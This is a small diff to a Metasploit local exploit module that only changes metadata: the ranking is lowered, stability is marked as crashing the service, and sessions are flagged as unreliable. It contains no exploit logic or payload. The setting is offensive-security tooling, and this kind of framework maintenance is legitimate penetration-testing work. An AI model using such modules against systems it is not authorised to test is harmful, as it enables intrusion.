@@ -1,5 +1,5 @@
 class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
@@ -49,9 +49,9 @@ class MetasploitModule < Msf::Exploit::Local
         'DisclosureDate' => '2021-02-19',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [ CRASH_SAFE, ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS ],
-          'Reliability' => []
+          'Reliability' => [ UNRELIABLE_SESSION ]
         },
         'Compat' => {
           'Meterpreter' => {
